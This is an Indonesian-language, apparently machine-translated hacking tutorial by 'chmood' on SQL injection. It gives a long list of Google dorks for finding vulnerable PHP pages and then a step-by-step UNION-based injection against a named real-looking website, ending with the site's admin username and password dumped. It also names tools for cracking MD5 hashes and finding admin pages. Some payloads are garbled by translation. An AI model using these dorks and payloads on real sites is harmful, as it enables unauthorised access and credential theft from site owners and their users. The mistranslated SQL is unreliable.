FIND ADMIN PAGE
Oleh
chmood
Diri bertanggung jawab atas apa yang Anda lakukan dengan informasi ini, maka diberikan untuk tujuan pendidikan saja.
Sebelum kita bahkan mulai, Anda perlu beberapa alat.
HackBar [FireFox]
Link dowload
https://addons.mozilla.org/firefox/addon/3899
|| OR ||
Anda dapat menggunakan website ini
http://home2.paulschou.net/tools/xlate/
Finder Admin
[Kami tidak akan menggunakan AdminFinder dalam tut ini, tetapi Anda akan membutuhkannya]
Admin Finder
Download link
http://uploading.com/files/KCDVDDST/admi...r.rar.html
atau
Pearl Finder
1) Pertama-download dan install ini
http://rapidshare.com/files/426832341/ActivePerl-5.10.1.1006-MSWin32-x86-291086__1_.msi
2) Download Kedua ini n ekstrak file di c drive
http://rapidshare.com/files/426832625/admin_login_finder_in_perl_language.rar
Sekarang, kita perlu sebuah situs. Untuk menemukan sebuah situs, kita perlu pergi ke Google, dan dimasukkan ke dalam salah satu dari berikut ini.
allinurl: index.php id =
allinurl:? id = trainers.php
allinurl:? buy.php kategori =
allinurl: article.php ID =
allinurl: play_old.php id =
allinurl:? newsitem.php num =
allinurl:? id = readnews.php
allinurl:? top10.php cat =
allinurl:? historialeer.php num =
allinurl:? reagir.php num =
allinurl:? Stray-Pertanyaan-view.php num =
allinurl:? forum_bds.php num =
allinurl:? id = game.php
allinurl: view_product.php id =
allinurl:? id = newsone.php
allinurl:? id = sw_comment.php
allinurl:? id = news.php
allinurl:? avd_start.php avd =
allinurl:? id = event.php
allinurl: produk-item.php id =
allinurl: sql.php id =
allinurl:? id = news_view.php
allinurl:? id = select_biblio.php
allinurl:? id = humor.php
allinurl:? id = aboutbook.php
allinurl:? ogl_inet.php ogl_id =
allinurl:? id = fiche_spectacle.php
allinurl:? id = communique_detail.php
allinurl:? id = sem.php3
allinurl:? id = kategorie.php4
allinurl:? id = news.php
allinurl: index.php id =
allinurl:? id = faq2.php
allinurl: show_an.php id =
allinurl:? id = preview.php
allinurl:? id = loadpsb.php
allinurl:? id = opinions.php
allinurl:? id = spr.php
allinurl: pages.php id =
allinurl:? id = announce.php
allinurl:? id = clanek.php4
allinurl:? id = participant.php
allinurl: download.php id =
allinurl:? id = main.php
allinurl:? id = review.php
allinurl:? id = chappies.php
allinurl:? id = read.php
allinurl:? id = prod_detail.php
allinurl:? id = viewphoto.php
allinurl: article.php id =
allinurl:? id = person.php
allinurl:? id = productinfo.php
allinurl:? id = showimg.php
allinurl:? id = view.php
allinurl:? id = website.php
allinurl:? id = hosting_info.php
allinurl: gallery.php id =
allinurl:? rub.php idr =
allinurl:? id = view_faq.php
allinurl:? id = artikelinfo.php
allinurl: detail.php ID =
allinurl: index.php =
allinurl:? id = profile_view.php
allinurl: category.php id =
allinurl:? id = publications.php
allinurl:? id = fellows.php
allinurl:? id = downloads_info.php
allinurl:? id = prod_info.php
allinurl: shop.php do = part & id =
allinurl:? id = productinfo.php
allinurl:? id = collectionitem.php
allinurl:? id = band_info.php
allinurl: product.php id =
allinurl:? id = releases.php
allinurl:? id = ray.php
allinurl: produit.php id =
allinurl:? id = pop.php
allinurl: shopping.php id =
allinurl:? id = productdetail.php
allinurl:? id = post.php
allinurl:? id = viewshowdetail.php
allinurl:? id = clubpage.php
allinurl:? id = memberInfo.php
allinurl:? id = section.php
allinurl:? id = theme.php
allinurl: page.php id =
allinurl:? shredder-categories.php id =
allinurl:? id = tradeCategory.php
allinurl:? product_ranges_view.php ID =
allinurl: shop_category.php id =
allinurl:? id = transcript.php
allinurl: channel_id =
allinurl: item_id =
allinurl: newsid =
allinurl:? id = trainers.php
allinurl: berita-full.php id =
allinurl:? news_display.php getId =
allinurl:? index2.php option =
allinurl:? id = readnews.php
allinurl:? top10.php cat =
allinurl:? id = newsone.php
allinurl:? id = event.php
allinurl: produk-item.php id =
allinurl: sql.php id =
allinurl:? id = aboutbook.php
allinurl:? id = preview.php
allinurl:? id = loadpsb.php
allinurl: pages.php id =
allinurl:? id = clanek.php4
allinurl:? id = announce.php
allinurl:? id = chappies.php
allinurl:? id = read.php
allinurl:? id = viewapp.php
allinurl:? id = viewphoto.php
allinurl:? rub.php idr =
allinurl:? galeri_info.php l =
allinurl:? id = review.php
allinurl: iniziativa.php di =?
allinurl:? id = curriculum.php
allinurl:? id = labels.php
allinurl:? id = story.php
allinurl:? look.php ID =
allinurl:? id = newsone.php
allinurl:? id = aboutbook.php
Untuk memeriksa apakah sebuah situs rentan, menempatkan 'setelah, seperti:
Kode:
http://www.site.com/news.php?id=5 '
Anda harus mendapatkan error SQL, seperti ini:
Kode:
PHP Warning: mysql_fetch_array (): argumen yang diberikan bukanlah MySQL hasil sumber daya yang valid di D: \ Domain \ tartanarmy.com \ wwwroot \ berita \ news.php on line 19 PHP Warning: mysql_fetch_array (): argumen yang diberikan bukanlah MySQL valid Hasil sumber daya di D: \ Domain \ tartanarmy.com \ wwwroot \ berita \ news.php on line 25
Oke, Sekarang bahwa Anda memiliki situs rentan Anda, Ill menunjukkan cara untuk melakukan injeksi SQL di atasnya.
Sakit akan melakukan injeksi saya di
Kode:
http://pakistanbodycount.org/news_detail.php?id=46
Jadi, saya menarik situs saya, dan saya menambahkan 'setelah, dan saya mendapatkan ERROR.
Ingat, ketika memeriksa kerentanan, kesalahan adalah hal yang baik.
Sekarang, saya perlu mencari tahu berapa banyak kolom berada di situs. Jadi saya mulai dengan:
Kode:
http://pakistanbodycount.org/news_detail.php?id=46 order by 3
Selalu mulai dengan 3, karena situs harus memiliki minimal 3 kolom. Jika Anda mendapatkan error pada 3, maka situs target Anda doesnt pernyataan serikat dukungan.
Ketika saya memesan dengan 3 beban halaman biasanya
Jadi situs tersebut memiliki lebih dari 3 kolom. Thats pertanda baik. Setelah 3, saya selalu pergi ke sepuluh.
Jadi:
http://pakistanbodycount.org/news_detail.php?id=46 order by 10
dan kami mendapatkan error
Jadi situs memiliki kurang dari 10 kolom.
Sekarang akan melihat sebenarnya berapa banyak kolom yang ada
Tidak ada order by 3 untuk memesan oleh 4 sampai kami mendapatkan beberapa error
ternyata bahwa kita mendapatkan error ketika kita menempatkan pesanan oleh 6
Kode: http://pakistanbodycount.org/news_detail.php?id=46 order by 6
Jadi kita mendapatkan kesalahan pada 6 itu berarti kita memiliki 5 kolom
Jadi sekarang kita perlu tahu mana yang kolom rentan. Jadi kita melakukan ini
http://pakistanbodycount.org/news_detail.php?id=-46 serikat pilih 1,2,3,4,5
PEMBERITAHUAN THE - DI DEPAN 46. Hal ini sangat penting dan harus ada setiap kali Anda melakukan Union pernyataan pilih.
Jadi tidak ada di situs Anda akan melihat beberapa angka
3,2,4
Kolom 3,2, dan 4 rentan.
Sekarang kita harus mengetahui versi SQL dari situs. Versi 5 adalah favorit kami, karena memiliki information.schema. Information.schema adalah teman kita, karena memberitahu kita hal. Artinya kita jangan harus menebak nama tabel, seperti kita akan di versi 4. Jadi untuk mengetahui apa versi situs kami berjalan, kami melakukan ini:
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2,@@versi, 4,5
Hore! Situs kami menjalankan versi 5. Jadi bagaimana akan kita dapatkan tabel? Seperti ini.
Kode
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2, group_concat (table_name), 4,5 dari information_schema.tables mana table_schema = database ()
Jadi sekarang di situs kami, kami melihat ini
admin, ledakan, drone, last_update, berita, halaman
Lihat di mana dikatakan admin? Thats apa yang kita inginkan. Tapi bagaimana akan kita mendapatkan info thats di sana? Seperti ini. * Jika Anda download hackbar, seperti yang saya bilang untuk, akan Anda membutuhkannya *
Kode: -
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2, group_concat (column_name), 4,5 dari information_schema.columns mana table_name = admin
Jadi, admin adalah apa yang kita ingin masuk ke dalam, tapi menempatkan itu hanya seperti itu wont work. Kita perlu terlalu mengubahnya menjadi CHAR (). The HackBar bisa melakukan itu. Sorot apa yang Anda ingin berubah menjadi CHAR () dan klik MySQL, maka MYSQL CHAR ().
Kode: -
CHAR (97, 100, 109, 105, 110)
OR OPSI KEDUA ADALAH WEBSITE GO TO WEBSITE YANG
Masukan admin di Teks n tekan encode
sekarang lihat ke dalam box 5 [Desember / CHAR]
Anda akan melihat beberapa nomor seperti ini
97 100 109 105 110
jus mengkonversi ini tidak untuk format ini
CHAR (97, 100, 109, 105, 110)
Jadi semuanya adalah:
http://pakistanbodycount.org/news_detail.php?id=-46 union select 1,2, group_concat (column_name), 4,5 dari information_schema.columns mana table_name = char (97, 100, 109, 105, 110)
Jadi kita melihat ini
idadmin, username, password
Keluar dari itu, kami ingin username dan password, kan? Jadi, untuk mendapatkan itu, kami melakukan ini:
http://pakistanbodycount.org/news_detail.php?id=-46 serikat pilih 1,2, group_concat (username, 0x3a, password), 4,5 dari admin
0x3a adalah Hex untuk titik dua, jadi jangan khawatir tentang itu.
Ketika kita masukan itu, situs kami menunjukkan kepada kita ini:
admin: monalisa
kita beruntung bahwa password tidak terenkripsi ... Tapi pada sebagian besar situs itu
di gunakan bahwa setiap situs web md5 mendekripsi (membuat pencarian googlr ull fina banyak) atau se Kain Dan Habel atau John The Ripper (linux) untuk memecahkan md5. tetapi jika keberuntungan Anda somtimes buruk enkripsi asin yang benar-benar sulit untuk istirahat
Dan menggunakan finder admin atau mutiara finder untuk menemukan halaman admin
Komentar